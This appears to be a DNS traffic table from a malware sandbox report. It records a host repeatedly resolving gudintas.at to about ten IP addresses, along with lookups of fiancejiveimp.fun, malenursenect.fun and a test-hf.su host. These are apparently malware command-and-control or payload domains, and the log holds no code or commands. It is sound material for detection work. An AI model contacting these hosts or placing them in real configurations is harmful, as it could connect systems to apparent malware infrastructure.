                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:19.807312965 CEST8.8.8.8192.168.2.30x5c53No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:21.617263079 CEST8.8.8.8192.168.2.30x6788No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:22.693098068 CEST8.8.8.8192.168.2.30x8f91No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:23.906943083 CEST8.8.8.8192.168.2.30x954eNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:25.506962061 CEST8.8.8.8192.168.2.30xcf32No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:26.634489059 CEST8.8.8.8192.168.2.30x4caaNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:28.977442980 CEST8.8.8.8192.168.2.30x4fdaNo error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:30.047101974 CEST8.8.8.8192.168.2.30xef90No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:54:31.730473995 CEST8.8.8.8192.168.2.30x47f4No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:04.166026115 CEST8.8.8.8192.168.2.30x1ab0No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:05.228233099 CEST8.8.8.8192.168.2.30xdc05No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:07.038897991 CEST8.8.8.8192.168.2.30xc73aNo error (0)h170811.srv22.test-hf.su91.227.16.22A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:10.944413900 CEST8.8.8.8192.168.2.30x86eaNo error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:11.847640038 CEST8.8.8.8192.168.2.30x5411Server failure (2)fullppc.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.028397083 CEST8.8.8.8192.168.2.30x2437No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.028397083 CEST8.8.8.8192.168.2.30x2437No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.277978897 CEST8.8.8.8192.168.2.30x48b1No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.599880934 CEST8.8.8.8192.168.2.30xc7b0No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:12.599880934 CEST8.8.8.8192.168.2.30xc7b0No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:13.282676935 CEST8.8.8.8192.168.2.30xb72cNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:13.282676935 CEST8.8.8.8192.168.2.30xb72cNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:13.821806908 CEST8.8.8.8192.168.2.30xc99No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:13.821806908 CEST8.8.8.8192.168.2.30xc99No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:14.510869026 CEST8.8.8.8192.168.2.30x90eNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:14.510869026 CEST8.8.8.8192.168.2.30x90eNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:15.412400007 CEST8.8.8.8192.168.2.30xa73dNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:15.412400007 CEST8.8.8.8192.168.2.30xa73dNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:15.948472023 CEST8.8.8.8192.168.2.30xb6eeNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:15.948472023 CEST8.8.8.8192.168.2.30xb6eeNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at180.94.156.61A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at186.182.55.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at186.147.159.19A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at200.92.136.254A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at201.124.243.137A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at211.181.24.133A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:16.907373905 CEST8.8.8.8192.168.2.30xad7cNo error (0)gudintas.at95.107.163.44A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:17.778377056 CEST8.8.8.8192.168.2.30x3754No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:17.778377056 CEST8.8.8.8192.168.2.30x3754No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.179146051 CEST8.8.8.8192.168.2.30xeabbRefused (5)farformafor.funnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.363257885 CEST8.8.8.8192.168.2.30xc1acNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.363257885 CEST8.8.8.8192.168.2.30xc1acNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.911356926 CEST8.8.8.8192.168.2.30xe311No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:18.911356926 CEST8.8.8.8192.168.2.30xe311No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.558413029 CEST8.8.8.8192.168.2.30x6f8bNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.558413029 CEST8.8.8.8192.168.2.30x6f8bNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.675420046 CEST8.8.8.8192.168.2.30x3f9No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:19.675420046 CEST8.8.8.8192.168.2.30x3f9No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.113327980 CEST8.8.8.8192.168.2.30xd36eNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.113327980 CEST8.8.8.8192.168.2.30xd36eNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.347726107 CEST8.8.8.8192.168.2.30x1285No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.347726107 CEST8.8.8.8192.168.2.30x1285No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.859746933 CEST8.8.8.8192.168.2.30x107cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:20.859746933 CEST8.8.8.8192.168.2.30x107cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.402916908 CEST8.8.8.8192.168.2.30x4eb7No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.402916908 CEST8.8.8.8192.168.2.30x4eb7No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.462615013 CEST8.8.8.8192.168.2.30xa47bNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:21.462615013 CEST8.8.8.8192.168.2.30xa47bNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.045336008 CEST8.8.8.8192.168.2.30x3d97No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.045336008 CEST8.8.8.8192.168.2.30x3d97No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.469707966 CEST8.8.8.8192.168.2.30x7f47No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.469707966 CEST8.8.8.8192.168.2.30x7f47No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.635590076 CEST8.8.8.8192.168.2.30x7a6dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:22.635590076 CEST8.8.8.8192.168.2.30x7a6dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.014930010 CEST8.8.8.8192.168.2.30xf1cdNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.014930010 CEST8.8.8.8192.168.2.30xf1cdNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.181235075 CEST8.8.8.8192.168.2.30xd23eNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
